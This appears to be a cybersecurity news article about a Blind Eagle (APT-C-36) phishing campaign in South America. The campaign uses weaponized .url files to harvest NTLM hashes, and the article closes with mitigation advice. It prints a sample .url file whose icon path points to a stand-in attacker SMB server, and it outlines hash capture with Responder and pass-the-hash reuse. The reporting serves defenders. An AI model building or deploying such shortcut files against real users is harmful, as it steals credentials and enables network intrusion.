The cybersecurity landscape has witnessed a concerning development as the threat actor group known as Blind Eagle (also tracked as APT-C-36) has launched a sophisticated campaign targeting organizations primarily in South America with a novel attack vector.
The group, known for its persistent targeting of Colombian entities, has expanded its tactical repertoire to include weaponized .url files designed specifically to extract user authentication hashes.
This method represents a significant evolution in their attack methodology, combining social engineering with technical exploitation to compromise corporate networks and gain unauthorized access to sensitive information.
The attack begins with spear-phishing emails containing seemingly innocuous .url shortcut files that appear legitimate to unsuspecting users.
When opened, these files initiate a connection to a remote server controlled by the threat actors, forcing the victim’s system to authenticate and inadvertently transmit NTLM authentication hashes.
This technique, while not new in the cybersecurity realm, has been refined by Blind Eagle to bypass common security measures and evade detection by conventional security tools.
Analysts at Check Point Research identified this campaign in early 2025, noting that the group has significantly refined their techniques compared to previous operations.
Their detailed analysis revealed that the attack has primarily targeted financial institutions, government agencies, and manufacturing organizations across Colombia, Ecuador, and Peru, with evidence suggesting potential expansion to other regions.
The technical mechanism behind this attack lies in the manipulation of the .url file format to trigger an automatic SMB authentication attempt to a malicious server.
When a user opens the weaponized .url file, Windows attempts to load an icon from the specified location, which the attackers have configured to point to their command-and-control server.
.webp)
This process shows the complete attack flow from email delivery to hash extraction.
Blind Eagle Attack Analysis
The weaponized .url files contain code specifically crafted to ensure the victim’s system attempts authentication to an attacker-controlled SMB server.
.webp)
Examination of the malicious .url files reveals a structure similar to the following:-
[InternetShortcut]
URL=https://legitimate-looking-website.com
IconFile=\\attacker-server\share\icon.ico
IconIndex=0
When the victim opens this file, Windows automatically attempts to retrieve the icon file from the specified network path, sending the user’s NTLM hash in the process.
The attackers then capture this hash using tools like Responder or similar hash capture utilities that depicts the server-side logging of captured authentication attempts.
These hashes can subsequently be cracked offline to reveal plaintext passwords or used in pass-the-hash attacks to move laterally within compromised networks.
The campaign demonstrates sophisticated operational security measures, with the attackers frequently rotating their infrastructure to avoid detection.
The command-and-control servers have been observed using dynamic DNS services and compromised legitimate websites as proxies to hide their true location.
Here the malicious .url files are typically distributed through targeted emails that mimic legitimate business communications, often referencing invoices, shipping notices, or official government communications.
Forensic analysis of compromised systems indicates that once the attackers gain initial access using the harvested credentials, they deploy additional payloads, including remote access trojans and information stealers.
.webp)
The first stage .url code snippet of the PowerShell commands executed post-compromise, revealing how the attackers establish persistence and begin reconnaissance activities within the victim’s network.
The researchers have identified several indicators of compromise associated with this campaign, including network connections to suspicious domains and the creation of specific registry keys used for persistence.
Organizations are advised to implement strict email filtering policies, disable automatic SMB authentication to external servers, and ensure all systems are patched with the latest security updates to mitigate this threat.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
